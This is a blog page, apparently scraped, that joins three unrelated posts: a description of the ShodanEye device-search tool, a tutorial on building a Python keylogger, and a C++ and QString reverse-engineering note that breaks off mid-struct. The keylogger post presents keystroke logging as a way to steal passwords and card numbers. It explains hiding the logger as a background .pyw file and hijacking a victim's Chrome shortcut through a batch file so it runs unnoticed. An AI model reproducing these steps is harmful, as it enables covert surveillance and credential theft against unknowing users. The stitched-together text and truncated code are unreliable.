السبت، 9 مايو 2020

ShodanEye: Collect Infomation About All Devices Connected To The Internet With Shodan

About ShodanEye
   This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.

   Here you can read the latest article about Shodan Eye: Shodan Eye Ethical Hacking Tool Release

   The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:

   The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.
   For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here

Shodan Eye Ethical Hacking Tool Release
   Before we start the year 2020, today there is a new big release ..! Please note, if you have already installed Shodan Eye on your computer, then it is worthwhile to read it carefully. Of course, even if you don't know this Shodan tool yet:
  • Shodan Eye goes from Python 2 to Python 3
  • Save the output of the Shodan Eye results
  • The entry of the Shodan password is no longer visible.

About Shodan Search Engine
   Shoan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.

   What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Before use this tool, you should note that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal..!

ShodanEye's screenshots:

ShodanEye Installation
   If you're using GNU/Linux, open your terminal and enter these commands:

   If you're a Windows user, follow these steps to install ShodanEye:
  • Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
  • Download shodan-eye-master.zip file.>
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install shodan
    python shodan-eye.py

Video Shodan Eye on YouTube:

Contact to the author:

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How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
def onKeyboardEvent(event):
return True
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
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Reversing C++ String And QString

After the rust string overview of its internal substructures, let's see if c++ QString storage is more light, but first we'r going to take a look to the c++ standard string object:

At first sight we can see the allocation and deallocation created by the clang++ compiler, and the DAT_00400d34 is the string.

If we use same algorithm than the rust code but in c++:

We have a different decompilation layout. Note that the Ghidra scans very fast the c++ binaries, and with rust binaries gets crazy for a while.
Locating main is also very simple in a c++ compiled binary, indeed is more  low-level than rust.

The byte array is initialized with a simply move instruction:
        00400c4b 48 b8 68        MOV        RAX,0x6f77206f6c6c6568

And basic_string generates the string, in the case of rust this was carazy endless set of calls, detected by ghidra as a runtime, but nevertheless the basic_string is an external imported function not included on the binary.

(gdb) x/x 0x7fffffffe1d0
0x7fffffffe1d0: 0xffffe1e0            low str ptr
0x7fffffffe1d4: 0x00007fff           hight str ptr
0x7fffffffe1d8: 0x0000000b        sz
0x7fffffffe1dc: 0x00000000
0x7fffffffe1e0: 0x6c6c6568         "hello world"
0x7fffffffe1e4: 0x6f77206f
0x7fffffffe1e8: 0x00646c72
0x7fffffffe1ec: 0x00000000        null terminated
(gdb) x/s 0x7fffffffe1e0
0x7fffffffe1e0: "hello world"

The string is on the stack, and it's very curious to see what happens if there are two followed strings like these:

  auto s = string(cstr);
  string s2 = "test";

Clang puts toguether both stack strings:

C++ QString datatype

Let's see the great and featured QString object defined on qstring.cpp and qstring.h

Some QString methods use the QCharRef class whose definition is below:

class Q_EXPORT QCharRef {
friend class QString;
QString& s;
uint p;
Searching for the properties on the QString class I've realized that one improvement that  rust and golang does is the separation from properties and methods, so in the large QString class the methods are  hidden among the hundreds of methods, but basically the storage is a QStringData *;

After removing the methods of QStringData class definition we have this:

struct Q_EXPORT QStringData : public QShared {
    QChar *unicode;
    char *ascii;
#ifdef Q_OS_MAC9
    uint len;
    uint len : 30;